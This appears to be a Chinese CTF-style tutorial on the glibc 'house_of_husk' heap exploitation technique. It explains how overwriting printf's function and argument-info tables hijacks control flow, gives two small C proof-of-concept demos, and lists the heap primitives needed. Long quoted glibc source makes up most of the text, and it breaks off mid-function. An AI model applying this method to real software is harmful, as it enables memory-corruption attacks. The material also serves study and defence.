house_of_husk

Heap
发布日期:   2025-03-21

基本原理

glibc源代码阅读:

https://codebrowser.dev/glibc/glibc

printf函数阅读路径:

https://codebrowser.dev/glibc/glibc/stdio-common/printf.c.html

最终经过一顿搜索找到了这个位置定义了相关函数:

https://codebrowser.dev/glibc/glibc/stdio-common/reg-printf.c.html#27

从上图中可以看出__register_printf_function函数是对__register_printf_specifier函数的一个封装;

__register_prntf_specifier源代码如下:

__register_printf_specifier (int spec, printf_function converter,
			     printf_arginfo_size_function arginfo)
{
  if (spec < 0 || spec > (int) UCHAR_MAX)
    {
      __set_errno (EINVAL);
      return -1;
    }
  int result = 0;
  __libc_lock_lock (lock);
  if (__printf_function_table == NULL)
    {
      __printf_arginfo_table = (printf_arginfo_size_function **)
	calloc (UCHAR_MAX + 1, sizeof (void *) * 2);
      if (__printf_arginfo_table == NULL)
	{
	  result = -1;
	  goto out;
	}
      __printf_function_table = (printf_function **)
	(__printf_arginfo_table + UCHAR_MAX + 1);
    }
  __printf_function_table[spec] = converter;
  __printf_arginfo_table[spec] = arginfo;
 out:
  __libc_lock_unlock (lock);
  return result;
}

其中spec应该就是占位符,其合法范围是0~0xff;

首先是给__printf_function_table分配空间,根据calloc的函数原型,我们可以知道其分配了0x100 * 2个指针的空间;然后将前0x100个指针给了__printf_arginfo_table, 后0x100个指针的空间给了__printf_function_table;

然后对应字符的空间分别赋值,值为传递进来的converter和arginfo;

下面关注printf的执行过程,在printf中调用了__vfprintf_internal

__vfprintf_internal中调用了printf_positional:

printf_positional中有如下调用:

printf_positional中调用了__parse_one_specmb函数:

__parse_one_specmb中也有对函数表的调用:

调用条件探索

首先笔者对调用链的触发条件进行盲测:

笔者使用的格式化字符串是:

/* ‘hello%w’ */

可以成功得到以下调链:

源代码分析得到如下流程:

__parse_one_specmb的过程大致如下:

最终到达目标地址:

因此我们只需要利用堆漏洞,使得__printf_function__table__printf_arginfo_table不为NULL,且__printf_arginfo_table中对应的函数指针不为空,即可实现控制流的劫持;

可见劫持控制流成功:

demo如下:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(){
    size_t libc_base = &printf - 0x0606f0;
    size_t __printf_function_table = libc_base + 0x21c9c8;
    size_t __printf_arginfo_table = libc_base + 0x21b8b0;
    *(void **)__printf_function_table = malloc(0x400);
    *(void **)__printf_arginfo_table = malloc(0x400);
    memset(*(void **)__printf_arginfo_table+0x77*8, 'a', 8);
    printf("Hello%w");
}

攻击模型优化

攻击模型1

上述模型的攻击条件是:

  1. __printf_function_table != 0;
  2. __printf_arginfo_table != 0;
  3. (size_t *)__printf_arginfo_tabl[chr] == goal;
  4. printf中有占位符;

__malloc_assert方法

__malloc_assert的调用链如下:

__malloc_assert()
	__fxprintf()
		locked_vfxprintf()
			__vfprintf_internal()

找到__fxprintf定义的位置:

https://codebrowser.dev/glibc/glibc/stdio-common/fxprintf.c.html

下面总结一下__malloc_assert中关于格式化字符串解析的调用链:

__malloc_assert()
	__fxprintf()
		__vfxprintf()
			locked_vfxprintf()
			__vfprintf_internal() <==> vfprintf()
				vfprintf()
					do_positional

__malloc_assert路径:

https://codebrowser.dev/glibc/glibc/malloc/malloc.c.html

通过逆向汇编代码看出来__malloc_assert 是无条件调用__fxprintf的:

下面是fxprintf到do_positional的过程:

利用__malloc_assert触发成功:

demo如下:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(){
    size_t libc_base = &printf - 0x0606f0;
    size_t __printf_function_table = libc_base + 0x21c9c8;
    size_t __printf_arginfo_table = libc_base + 0x21b8b0;
    *(void **)__printf_function_table = malloc(0x400);
    *(void **)__printf_arginfo_table = malloc(0x400);
    memset(*(void **)__printf_arginfo_table, 'a', 0x400);
    char *a = malloc(0x40);
    a[0x48] = "\x55";
    a[0x49] = '\x00';
    a[0x4a] = '\x00';
    malloc(0x60);
}

攻击模型2

因此攻击模型可以优化为:

  1. __printf_function_table != 0`;
  2. __printf_arginfo_table != 0;
  3. (size_t *)__printf_arginfo_tabl[chr] == goal;
  4. __malloc_assert;

前三个攻击条件分析总结

前三个攻击条件基本可以总结为两次任意libc地址写,其中一次较弱(__printf_function_table似乎任意写个数据即可),另一次较强,需要写入可控地址;

可用方法如下:

  1. 两次largebin attack;(或者__printf_function_table用tcache_unlink_smashing、__printf_arginfo_table用largebin_attack);
  2. darknote的乘法溢出,然后任意libc地址空间分配堆地址;
  3. 攻击global_fast_max,然后free过去,需要同时有UAF;
  4. 其他任意地址写;

定位

函数:register_printf_function

在IDA中能找到:

例题

SUtext

附录

calloc函数原型

printf_positional源代码:

static int
printf_positional (FILE *s, const CHAR_T *format, int readonly_format,
		   va_list ap, va_list *ap_savep, int done, int nspecs_done,
		   const UCHAR_T *lead_str_end,
		   CHAR_T *work_buffer, int save_errno,
		   const char *grouping, THOUSANDS_SEP_T thousands_sep,
		   unsigned int mode_flags)
{
  /* For positional argument handling.  */
  struct scratch_buffer specsbuf;
  scratch_buffer_init (&specsbuf);
  struct printf_spec *specs = specsbuf.data;
  size_t specs_limit = specsbuf.length / sizeof (specs[0]);
  /* Used as a backing store for args_value, args_size, args_type
     below.  */
  struct scratch_buffer argsbuf;
  scratch_buffer_init (&argsbuf);
  /* Array with information about the needed arguments.  This has to
     be dynamically extensible.  */
  size_t nspecs = 0;
  /* The number of arguments the format string requests.  This will
     determine the size of the array needed to store the argument
     attributes.  */
  size_t nargs = 0;
  /* Positional parameters refer to arguments directly.  This could
     also determine the maximum number of arguments.  Track the
     maximum number.  */
  size_t max_ref_arg = 0;
  /* Just a counter.  */
  size_t cnt;
  if (grouping == (const char *) -1)
    {
#ifdef COMPILE_WPRINTF
      thousands_sep = _NL_CURRENT_WORD (LC_NUMERIC,
					_NL_NUMERIC_THOUSANDS_SEP_WC);
#else
      thousands_sep = _NL_CURRENT (LC_NUMERIC, THOUSANDS_SEP);
#endif
      grouping = _NL_CURRENT (LC_NUMERIC, GROUPING);
      if (*grouping == '\0' || *grouping == CHAR_MAX)
	grouping = NULL;
    }
  for (const UCHAR_T *f = lead_str_end; *f != L_('\0');
       f = specs[nspecs++].next_fmt)
    {
      if (nspecs == specs_limit)
	{
	  if (!scratch_buffer_grow_preserve (&specsbuf))
	    {
	      done = -1;
	      goto all_done;
	    }
	  specs = specsbuf.data;
	  specs_limit = specsbuf.length / sizeof (specs[0]);
	}
      /* Parse the format specifier.  */
#ifdef COMPILE_WPRINTF
      nargs += __parse_one_specwc (f, nargs, &specs[nspecs], &max_ref_arg);
#else
      nargs += __parse_one_specmb (f, nargs, &specs[nspecs], &max_ref_arg);
#endif
    }
  /* Determine the number of arguments the format string consumes.  */
  nargs = MAX (nargs, max_ref_arg);
  union printf_arg *args_value;
  int *args_size;
  int *args_type;
  {
    /* Calculate total size needed to represent a single argument
       across all three argument-related arrays.  */
    size_t bytes_per_arg
      = sizeof (*args_value) + sizeof (*args_size) + sizeof (*args_type);
    if (!scratch_buffer_set_array_size (&argsbuf, nargs, bytes_per_arg))
      {
	done = -1;
	goto all_done;
      }
    args_value = argsbuf.data;
    /* Set up the remaining two arrays to each point past the end of
       the prior array, since space for all three has been allocated
       now.  */
    args_size = &args_value[nargs].pa_int;
    args_type = &args_size[nargs];
    memset (args_type, (mode_flags & PRINTF_FORTIFY) != 0 ? '\xff' : '\0',
	    nargs * sizeof (*args_type));
  }
  /* XXX Could do sanity check here: If any element in ARGS_TYPE is
     still zero after this loop, format is invalid.  For now we
     simply use 0 as the value.  */
  /* Fill in the types of all the arguments.  */
  for (cnt = 0; cnt < nspecs; ++cnt)
    {
      /* If the width is determined by an argument this is an int.  */
      if (specs[cnt].width_arg != -1)
	args_type[specs[cnt].width_arg] = PA_INT;
      /* If the precision is determined by an argument this is an int.  */
      if (specs[cnt].prec_arg != -1)
	args_type[specs[cnt].prec_arg] = PA_INT;
      switch (specs[cnt].ndata_args)
	{
	case 0:		/* No arguments.  */
	  break;
	case 1:		/* One argument; we already have the
			   type and size.  */
	  args_type[specs[cnt].data_arg] = specs[cnt].data_arg_type;
	  args_size[specs[cnt].data_arg] = specs[cnt].size;
	  break;
	default:
	  /* We have more than one argument for this format spec.
	     We must call the arginfo function again to determine
	     all the types.  */
	  (void) (*__printf_arginfo_table[specs[cnt].info.spec])
	    (&specs[cnt].info,
	     specs[cnt].ndata_args, &args_type[specs[cnt].data_arg],
	     &args_size[specs[cnt].data_arg]);
	  break;
	}
    }
  /* Now we know all the types and the order.  Fill in the argument
     values.  */
  for (cnt = 0; cnt < nargs; ++cnt)
    switch (args_type[cnt])
      {
#define T(tag, mem, type)				\
	case tag:					\
	  args_value[cnt].mem = va_arg (*ap_savep, type); \
	  break
	T (PA_WCHAR, pa_wchar, wint_t);
      case PA_CHAR:				/* Promoted.  */
      case PA_INT|PA_FLAG_SHORT:		/* Promoted.  */
#if LONG_MAX == INT_MAX
      case PA_INT|PA_FLAG_LONG:
#endif
	T (PA_INT, pa_int, int);
#if LONG_MAX == LONG_LONG_MAX
      case PA_INT|PA_FLAG_LONG:
#endif
	T (PA_INT|PA_FLAG_LONG_LONG, pa_long_long_int, long long int);
#if LONG_MAX != INT_MAX && LONG_MAX != LONG_LONG_MAX
# error "he?"
#endif
      case PA_FLOAT:				/* Promoted.  */
	T (PA_DOUBLE, pa_double, double);
      case PA_DOUBLE|PA_FLAG_LONG_DOUBLE:
	if (__glibc_unlikely ((mode_flags & PRINTF_LDBL_IS_DBL) != 0))
	  {
	    args_value[cnt].pa_double = va_arg (*ap_savep, double);
	    args_type[cnt] &= ~PA_FLAG_LONG_DOUBLE;
	  }
#if __HAVE_FLOAT128_UNLIKE_LDBL
	else if ((mode_flags & PRINTF_LDBL_USES_FLOAT128) != 0)
	  args_value[cnt].pa_float128 = va_arg (*ap_savep, _Float128);
#endif
	else
	  args_value[cnt].pa_long_double = va_arg (*ap_savep, long double);
	break;
      case PA_STRING:				/* All pointers are the same */
      case PA_WSTRING:			/* All pointers are the same */
	T (PA_POINTER, pa_pointer, void *);
#undef T
      default:
	if ((args_type[cnt] & PA_FLAG_PTR) != 0)
	  args_value[cnt].pa_pointer = va_arg (*ap_savep, void *);
	else if (__glibc_unlikely (__printf_va_arg_table != NULL)
		 && __printf_va_arg_table[args_type[cnt] - PA_LAST] != NULL)
	  {
	    args_value[cnt].pa_user = alloca (args_size[cnt]);
	    (*__printf_va_arg_table[args_type[cnt] - PA_LAST])
	      (args_value[cnt].pa_user, ap_savep);
	  }
	else
	  memset (&args_value[cnt], 0, sizeof (args_value[cnt]));
	break;
      case -1:
	/* Error case.  Not all parameters appear in N$ format
	   strings.  We have no way to determine their type.  */
	assert ((mode_flags & PRINTF_FORTIFY) != 0);
	__libc_fatal ("*** invalid %N$ use detected ***\n");
      }
  /* Now walk through all format specifiers and process them.  */
  for (; (size_t) nspecs_done < nspecs; ++nspecs_done)
    {
      STEP4_TABLE;
      int is_negative;
      union
      {
	unsigned long long int longlong;
	unsigned long int word;
      } number;
      int base;
      CHAR_T *string;		/* Pointer to argument string.  */
      /* Fill variables from values in struct.  */
      int alt = specs[nspecs_done].info.alt;
      int space = specs[nspecs_done].info.space;
      int left = specs[nspecs_done].info.left;
      int showsign = specs[nspecs_done].info.showsign;
      int group = specs[nspecs_done].info.group;
      int is_long_double __attribute__ ((unused))
	= specs[nspecs_done].info.is_long_double;
      int is_short = specs[nspecs_done].info.is_short;
      int is_char = specs[nspecs_done].info.is_char;
      int is_long = specs[nspecs_done].info.is_long;
      int width = specs[nspecs_done].info.width;
      int prec = specs[nspecs_done].info.prec;
      int use_outdigits = specs[nspecs_done].info.i18n;
      char pad = specs[nspecs_done].info.pad;
      CHAR_T spec = specs[nspecs_done].info.spec;
      CHAR_T *workend = work_buffer + WORK_BUFFER_SIZE;
      /* Fill in last information.  */
      if (specs[nspecs_done].width_arg != -1)
	{
	  /* Extract the field width from an argument.  */
	  specs[nspecs_done].info.width =
	    args_value[specs[nspecs_done].width_arg].pa_int;
	  if (specs[nspecs_done].info.width < 0)
	    /* If the width value is negative left justification is
	       selected and the value is taken as being positive.  */
	    {
	      specs[nspecs_done].info.width *= -1;
	      left = specs[nspecs_done].info.left = 1;
	    }
	  width = specs[nspecs_done].info.width;
	}
      if (specs[nspecs_done].prec_arg != -1)
	{
	  /* Extract the precision from an argument.  */
	  specs[nspecs_done].info.prec =
	    args_value[specs[nspecs_done].prec_arg].pa_int;
	  if (specs[nspecs_done].info.prec < 0)
	    /* If the precision is negative the precision is
	       omitted.  */
	    specs[nspecs_done].info.prec = -1;
	  prec = specs[nspecs_done].info.prec;
	}
      /* Process format specifiers.  */
      while (1)
	{
	  extern printf_function **__printf_function_table;
	  int function_done;
	  if (spec <= UCHAR_MAX
	      && __printf_function_table != NULL
	      && __printf_function_table[(size_t) spec] != NULL)
	    {
	      const void **ptr = alloca (specs[nspecs_done].ndata_args
					 * sizeof (const void *));
	      /* Fill in an array of pointers to the argument values.  */
	      for (unsigned int i = 0; i < specs[nspecs_done].ndata_args;
		   ++i)
		ptr[i] = &args_value[specs[nspecs_done].data_arg + i];
	      /* Call the function.  */
	      function_done = __printf_function_table[(size_t) spec]
		(s, &specs[nspecs_done].info, ptr);
	      if (function_done != -2)
		{
		  /* If an error occurred we don't have information
		     about # of chars.  */
		  if (function_done < 0)
		    {
		      /* Function has set errno.  */
		      done = -1;
		      goto all_done;
		    }
		  done_add (function_done);
		  break;
		}
	    }
	  JUMP (spec, step4_jumps);
#define process_arg_data args_value[specs[nspecs_done].data_arg]
#define process_arg_int() process_arg_data.pa_int
#define process_arg_long_int() process_arg_data.pa_long_int
#define process_arg_long_long_int() process_arg_data.pa_long_long_int
#define process_arg_pointer() process_arg_data.pa_pointer
#define process_arg_string() process_arg_data.pa_string
#define process_arg_unsigned_int() process_arg_data.pa_u_int
#define process_arg_unsigned_long_int() process_arg_data.pa_u_long_int
#define process_arg_unsigned_long_long_int() process_arg_data.pa_u_long_long_int
#define process_arg_wchar_t() process_arg_data.pa_wchar
#define process_arg_wstring() process_arg_data.pa_wstring
	  process_arg ();
	  process_string_arg ();
#undef process_arg_data
#undef process_arg_int
#undef process_arg_long_int
#undef process_arg_long_long_int
#undef process_arg_pointer
#undef process_arg_string
#undef process_arg_unsigned_int
#undef process_arg_unsigned_long_int
#undef process_arg_unsigned_long_long_int
#undef process_arg_wchar_t
#undef process_arg_wstring
	  LABEL (form_float):
	  LABEL (form_floathex):
	  {
	    const void *ptr
	      = (const void *) &args_value[specs[nspecs_done].data_arg];
	    if (__glibc_unlikely ((mode_flags & PRINTF_LDBL_IS_DBL) != 0))
	      {
		specs[nspecs_done].data_arg_type = PA_DOUBLE;
		specs[nspecs_done].info.is_long_double = 0;
	      }
	    SETUP_FLOAT128_INFO (specs[nspecs_done].info);
	    int function_done
	      = __printf_fp_spec (s, &specs[nspecs_done].info, &ptr);
	    if (function_done < 0)
	      {
		/* Error in print handler; up to handler to set errno.  */
		done = -1;
		goto all_done;
	      }
	    done_add (function_done);
	  }
	  break;
	  LABEL (form_unknown):
	  {
	    unsigned int i;
	    const void **ptr;
	    ptr = alloca (specs[nspecs_done].ndata_args
			  * sizeof (const void *));
	    /* Fill in an array of pointers to the argument values.  */
	    for (i = 0; i < specs[nspecs_done].ndata_args; ++i)
	      ptr[i] = &args_value[specs[nspecs_done].data_arg + i];
	    /* Call the function.  */
	    function_done = printf_unknown (s, &specs[nspecs_done].info,
					    ptr);
	    /* If an error occurred we don't have information about #
	       of chars.  */
	    if (function_done < 0)
	      {
		/* Function has set errno.  */
		done = -1;
		goto all_done;
	      }
	    done_add (function_done);
	  }
	  break;
	}
      /* Write the following constant string.  */
      outstring (specs[nspecs_done].end_of_fmt,
		 specs[nspecs_done].next_fmt
		 - specs[nspecs_done].end_of_fmt);
    }
 all_done:
  scratch_buffer_free (&argsbuf);
  scratch_buffer_free (&specsbuf);
  return done;
}

__vfprintf_internal源代码:

/* The function itself.  */
int
vfprintf (FILE *s, const CHAR_T *format, va_list ap, unsigned int mode_flags)
{
  /* The character used as thousands separator.  */
  THOUSANDS_SEP_T thousands_sep = 0;
  /* The string describing the size of groups of digits.  */
  const char *grouping;
  /* Place to accumulate the result.  */
  int done;
  /* Current character in format string.  */
  const UCHAR_T *f;
  /* End of leading constant string.  */
  const UCHAR_T *lead_str_end;
  /* Points to next format specifier.  */
  const UCHAR_T *end_of_spec;
  /* Buffer intermediate results.  */
  CHAR_T work_buffer[WORK_BUFFER_SIZE];
  CHAR_T *workend;
  /* We have to save the original argument pointer.  */
  va_list ap_save;
  /* Count number of specifiers we already processed.  */
  int nspecs_done;
  /* For the %m format we may need the current `errno' value.  */
  int save_errno = errno;
  /* 1 if format is in read-only memory, -1 if it is in writable memory,
     0 if unknown.  */
  int readonly_format = 0;
  /* Orient the stream.  */
#ifdef ORIENT
  ORIENT;
#endif
  /* Sanity check of arguments.  */
  ARGCHECK (s, format);
#ifdef ORIENT
  /* Check for correct orientation.  */
  if (_IO_vtable_offset (s) == 0
      && _IO_fwide (s, sizeof (CHAR_T) == 1 ? -1 : 1)
      != (sizeof (CHAR_T) == 1 ? -1 : 1))
    /* The stream is already oriented otherwise.  */
    return EOF;
#endif
  if (UNBUFFERED_P (s))
    /* Use a helper function which will allocate a local temporary buffer
       for the stream and then call us again.  */
    return buffered_vfprintf (s, format, ap, mode_flags);
  /* Initialize local variables.  */
  done = 0;
  grouping = (const char *) -1;
#ifdef __va_copy
  /* This macro will be available soon in gcc's <stdarg.h>.  We need it
     since on some systems `va_list' is not an integral type.  */
  __va_copy (ap_save, ap);
#else
  ap_save = ap;
#endif
  nspecs_done = 0;
#ifdef COMPILE_WPRINTF
  /* Find the first format specifier.  */
  f = lead_str_end = __find_specwc ((const UCHAR_T *) format);
#else
  /* Find the first format specifier.  */
  f = lead_str_end = __find_specmb ((const UCHAR_T *) format);
#endif
  /* Lock stream.  */
  _IO_cleanup_region_start ((void (*) (void *)) &_IO_funlockfile, s);
  _IO_flockfile (s);
  /* Write the literal text before the first format.  */
  outstring ((const UCHAR_T *) format,
	     lead_str_end - (const UCHAR_T *) format);
  /* If we only have to print a simple string, return now.  */
  if (*f == L_('\0'))
    goto all_done;
  /* Use the slow path in case any printf handler is registered.  */
  if (__glibc_unlikely (__printf_function_table != NULL
			|| __printf_modifier_table != NULL
			|| __printf_va_arg_table != NULL))
    goto do_positional;
  /* Process whole format string.  */
  do
    {
      STEP0_3_TABLE;
      STEP4_TABLE;
      int is_negative;	/* Flag for negative number.  */
      union
      {
	unsigned long long int longlong;
	unsigned long int word;
      } number;
      int base;
      union printf_arg the_arg;
      CHAR_T *string;	/* Pointer to argument string.  */
      int alt = 0;	/* Alternate format.  */
      int space = 0;	/* Use space prefix if no sign is needed.  */
      int left = 0;	/* Left-justify output.  */
      int showsign = 0;	/* Always begin with plus or minus sign.  */
      int group = 0;	/* Print numbers according grouping rules.  */
      /* Argument is long double/long long int.  Only used if
	 double/long double or long int/long long int are distinct.  */
      int is_long_double __attribute__ ((unused)) = 0;
      int is_short = 0;	/* Argument is short int.  */
      int is_long = 0;	/* Argument is long int.  */
      int is_char = 0;	/* Argument is promoted (unsigned) char.  */
      int width = 0;	/* Width of output; 0 means none specified.  */
      int prec = -1;	/* Precision of output; -1 means none specified.  */
      /* This flag is set by the 'I' modifier and selects the use of the
	 `outdigits' as determined by the current locale.  */
      int use_outdigits = 0;
      UCHAR_T pad = L_(' ');/* Padding character.  */
      CHAR_T spec;
      workend = work_buffer + WORK_BUFFER_SIZE;
      /* Get current character in format string.  */
      JUMP (*++f, step0_jumps);
      /* ' ' flag.  */
    LABEL (flag_space):
      space = 1;
      JUMP (*++f, step0_jumps);
      /* '+' flag.  */
    LABEL (flag_plus):
      showsign = 1;
      JUMP (*++f, step0_jumps);
      /* The '-' flag.  */
    LABEL (flag_minus):
      left = 1;
      pad = L_(' ');
      JUMP (*++f, step0_jumps);
      /* The '#' flag.  */
    LABEL (flag_hash):
      alt = 1;
      JUMP (*++f, step0_jumps);
      /* The '0' flag.  */
    LABEL (flag_zero):
      if (!left)
	pad = L_('0');
      JUMP (*++f, step0_jumps);
      /* The '\'' flag.  */
    LABEL (flag_quote):
      group = 1;
      if (grouping == (const char *) -1)
	{
#ifdef COMPILE_WPRINTF
	  thousands_sep = _NL_CURRENT_WORD (LC_NUMERIC,
					    _NL_NUMERIC_THOUSANDS_SEP_WC);
#else
	  thousands_sep = _NL_CURRENT (LC_NUMERIC, THOUSANDS_SEP);
#endif
	  grouping = _NL_CURRENT (LC_NUMERIC, GROUPING);
	  if (*grouping == '\0' || *grouping == CHAR_MAX
#ifdef COMPILE_WPRINTF
	      || thousands_sep == L'\0'
#else
	      || *thousands_sep == '\0'
#endif
	      )
	    grouping = NULL;
	}
      JUMP (*++f, step0_jumps);
    LABEL (flag_i18n):
      use_outdigits = 1;
      JUMP (*++f, step0_jumps);
      /* Get width from argument.  */
    LABEL (width_asterics):
      {
	const UCHAR_T *tmp;	/* Temporary value.  */
	tmp = ++f;
	if (ISDIGIT (*tmp))
	  {
	    int pos = read_int (&tmp);
	    if (pos == -1)
	      {
		__set_errno (EOVERFLOW);
		done = -1;
		goto all_done;
	      }
	    if (pos && *tmp == L_('$'))
	      /* The width comes from a positional parameter.  */
	      goto do_positional;
	  }
	width = va_arg (ap, int);
	/* Negative width means left justified.  */
	if (width < 0)
	  {
	    width = -width;
	    pad = L_(' ');
	    left = 1;
	  }
      }
      JUMP (*f, step1_jumps);
      /* Given width in format string.  */
    LABEL (width):
      width = read_int (&f);
      if (__glibc_unlikely (width == -1))
	{
	  __set_errno (EOVERFLOW);
	  done = -1;
	  goto all_done;
	}
      if (*f == L_('$'))
	/* Oh, oh.  The argument comes from a positional parameter.  */
	goto do_positional;
      JUMP (*f, step1_jumps);
    LABEL (precision):
      ++f;
      if (*f == L_('*'))
	{
	  const UCHAR_T *tmp;	/* Temporary value.  */
	  tmp = ++f;
	  if (ISDIGIT (*tmp))
	    {
	      int pos = read_int (&tmp);
	      if (pos == -1)
		{
		  __set_errno (EOVERFLOW);
		  done = -1;
		  goto all_done;
		}
	      if (pos && *tmp == L_('$'))
		/* The precision comes from a positional parameter.  */
		goto do_positional;
	    }
	  prec = va_arg (ap, int);
	  /* If the precision is negative the precision is omitted.  */
	  if (prec < 0)
	    prec = -1;
	}
      else if (ISDIGIT (*f))
	{
	  prec = read_int (&f);
	  /* The precision was specified in this case as an extremely
	     large positive value.  */
	  if (prec == -1)
	    {
	      __set_errno (EOVERFLOW);
	      done = -1;
	      goto all_done;
	    }
	}
      else
	prec = 0;
      JUMP (*f, step2_jumps);
      /* Process 'h' modifier.  There might another 'h' following.  */
    LABEL (mod_half):
      is_short = 1;
      JUMP (*++f, step3a_jumps);
      /* Process 'hh' modifier.  */
    LABEL (mod_halfhalf):
      is_short = 0;
      is_char = 1;
      JUMP (*++f, step4_jumps);
      /* Process 'l' modifier.  There might another 'l' following.  */
    LABEL (mod_long):
      is_long = 1;
      JUMP (*++f, step3b_jumps);
      /* Process 'L', 'q', or 'll' modifier.  No other modifier is
	 allowed to follow.  */
    LABEL (mod_longlong):
      is_long_double = 1;
      is_long = 1;
      JUMP (*++f, step4_jumps);
    LABEL (mod_size_t):
      is_long_double = sizeof (size_t) > sizeof (unsigned long int);
      is_long = sizeof (size_t) > sizeof (unsigned int);
      JUMP (*++f, step4_jumps);
    LABEL (mod_ptrdiff_t):
      is_long_double = sizeof (ptrdiff_t) > sizeof (unsigned long int);
      is_long = sizeof (ptrdiff_t) > sizeof (unsigned int);
      JUMP (*++f, step4_jumps);
    LABEL (mod_intmax_t):
      is_long_double = sizeof (intmax_t) > sizeof (unsigned long int);
      is_long = sizeof (intmax_t) > sizeof (unsigned int);
      JUMP (*++f, step4_jumps);
      /* Process current format.  */
      while (1)
	{
#define process_arg_int() va_arg (ap, int)
#define process_arg_long_int() va_arg (ap, long int)
#define process_arg_long_long_int() va_arg (ap, long long int)
#define process_arg_pointer() va_arg (ap, void *)
#define process_arg_string() va_arg (ap, const char *)
#define process_arg_unsigned_int() va_arg (ap, unsigned int)
#define process_arg_unsigned_long_int() va_arg (ap, unsigned long int)
#define process_arg_unsigned_long_long_int() va_arg (ap, unsigned long long int)
#define process_arg_wchar_t() va_arg (ap, wchar_t)
#define process_arg_wstring() va_arg (ap, const wchar_t *)
	  process_arg ();
	  process_string_arg ();
#undef process_arg_int
#undef process_arg_long_int
#undef process_arg_long_long_int
#undef process_arg_pointer
#undef process_arg_string
#undef process_arg_unsigned_int
#undef process_arg_unsigned_long_int
#undef process_arg_unsigned_long_long_int
#undef process_arg_wchar_t
#undef process_arg_wstring
	LABEL (form_float):
	LABEL (form_floathex):
	  {
	    if (__glibc_unlikely ((mode_flags & PRINTF_LDBL_IS_DBL) != 0))
	      is_long_double = 0;
	    struct printf_info info =
	      {
		.prec = prec,
		.width = width,
		.spec = spec,
		.is_long_double = is_long_double,
		.is_short = is_short,
		.is_long = is_long,
		.alt = alt,
		.space = space,
		.left = left,
		.showsign = showsign,
		.group = group,
		.pad = pad,
		.extra = 0,
		.i18n = use_outdigits,
		.wide = sizeof (CHAR_T) != 1,
		.is_binary128 = 0
	      };
	    PARSE_FLOAT_VA_ARG_EXTENDED (info);
	    const void *ptr = &the_arg;
	    int function_done = __printf_fp_spec (s, &info, &ptr);
	    if (function_done < 0)
	      {
		done = -1;
		goto all_done;
	      }
	    done_add (function_done);
	  }
	  break;
	LABEL (form_unknown):
	  if (spec == L_('\0'))
	    {
	      /* The format string ended before the specifier is complete.  */
	      __set_errno (EINVAL);
	      done = -1;
	      goto all_done;
	    }
	  /* If we are in the fast loop force entering the complicated
	     one.  */
	  goto do_positional;
	}
      /* The format is correctly handled.  */
      ++nspecs_done;
      /* Look for next format specifier.  */
#ifdef COMPILE_WPRINTF
      f = __find_specwc ((end_of_spec = ++f));
#else
      f = __find_specmb ((end_of_spec = ++f));
#endif
      /* Write the following constant string.  */
      outstring (end_of_spec, f - end_of_spec);
    }
  while (*f != L_('\0'));
  /* Unlock stream and return.  */
  goto all_done;
  /* Hand off processing for positional parameters.  */
do_positional:
  done = printf_positional (s, format, readonly_format, ap, &ap_save,
			    done, nspecs_done, lead_str_end, work_buffer,
			    save_errno, grouping, thousands_sep, mode_flags);
 all_done:
  /* Unlock the stream.  */
  _IO_funlockfile (s);
  _IO_cleanup_region_end (0);
  return done;
}

__parse_one_specmb源代码


__parse_one_specmb (const UCHAR_T *format, size_t posn,
		    struct printf_spec *spec, size_t *max_ref_arg)
#endif
{
  unsigned int n;
  size_t nargs = 0;
  /* Skip the '%'.  */
  ++format;
  /* Clear information structure.  */
  spec->data_arg = -1;
  spec->info.alt = 0;
  spec->info.space = 0;
  spec->info.left = 0;
  spec->info.showsign = 0;
  spec->info.group = 0;
  spec->info.i18n = 0;
  spec->info.extra = 0;
  spec->info.pad = ' ';
  spec->info.wide = sizeof (UCHAR_T) > 1;
  spec->info.is_binary128 = 0;
  /* Test for positional argument.  */
  if (ISDIGIT (*format))  //ISDIGIT 是一个宏,用于检查给定的字符是否为数字字符
    {
      const UCHAR_T *begin = format;
      n = read_int (&format);//从字符串中读取一个整数
      if (n != 0 && *format == L_('$'))
	/* Is positional parameter.  */
	{
	  ++format;		/* Skip the '$'.  */
	  if (n != -1)
	    {
	      spec->data_arg = n - 1;
	      *max_ref_arg = MAX (*max_ref_arg, n);
	    }
	}
      else
	/* Oops; that was actually the width and/or 0 padding flag.
	   Step back and read it again.  */
	format = begin;
    }
  /* Check for spec modifiers.  */
  do
    {
      switch (*format)
	{
	case L_(' '):
	  /* Output a space in place of a sign, when there is no sign.  */
	  spec->info.space = 1;
	  continue;
	case L_('+'):
	  /* Always output + or - for numbers.  */
	  spec->info.showsign = 1;
	  continue;
	case L_('-'):
	  /* Left-justify things.  */
	  spec->info.left = 1;
	  continue;
	case L_('#'):
	  /* Use the "alternate form":
	     Hex has 0x or 0X, FP always has a decimal point.  */
	  spec->info.alt = 1;
	  continue;
	case L_('0'):
	  /* Pad with 0s.  */
	  spec->info.pad = '0';
	  continue;
	case L_('\''):
	  /* Show grouping in numbers if the locale information
	     indicates any.  */
	  spec->info.group = 1;
	  continue;
	case L_('I'):
	  /* Use the internationalized form of the output.  Currently
	     means to use the `outdigits' of the current locale.  */
	  spec->info.i18n = 1;
	  continue;
	default:
	  break;
	}
      break;
    }
  while (*++format);
  if (spec->info.left)
    spec->info.pad = ' ';
  /* Get the field width.  */
  spec->width_arg = -1;
  spec->info.width = 0;
  if (*format == L_('*'))
    {
      /* The field width is given in an argument.
	 A negative field width indicates left justification.  */
      const UCHAR_T *begin = ++format;
      if (ISDIGIT (*format))
	{
	  /* The width argument might be found in a positional parameter.  */
	  n = read_int (&format);
	  if (n != 0 && *format == L_('$'))
	    {
	      if (n != -1)
		{
		  spec->width_arg = n - 1;
		  *max_ref_arg = MAX (*max_ref_arg, n);
		}
	      ++format;		/* Skip '$'.  */
	    }
	}
      if (spec->width_arg < 0)
	{
	  /* Not in a positional parameter.  Consume one argument.  */
	  spec->width_arg = posn++;
	  ++nargs;
	  format = begin;	/* Step back and reread.  */
	}
    }
  else if (ISDIGIT (*format))
    {
      int n = read_int (&format);
      /* Constant width specification.  */
      if (n != -1)
	spec->info.width = n;
    }
  /* Get the precision.  */
  spec->prec_arg = -1;
  /* -1 means none given; 0 means explicit 0.  */
  spec->info.prec = -1;
  if (*format == L_('.'))
    {
      ++format;
      if (*format == L_('*'))
	{
	  /* The precision is given in an argument.  */
	  const UCHAR_T *begin = ++format;
	  if (ISDIGIT (*format))
	    {
	      n = read_int (&format);
	      if (n != 0 && *format == L_('$'))
		{
		  if (n != -1)
		    {
		      spec->prec_arg = n - 1;
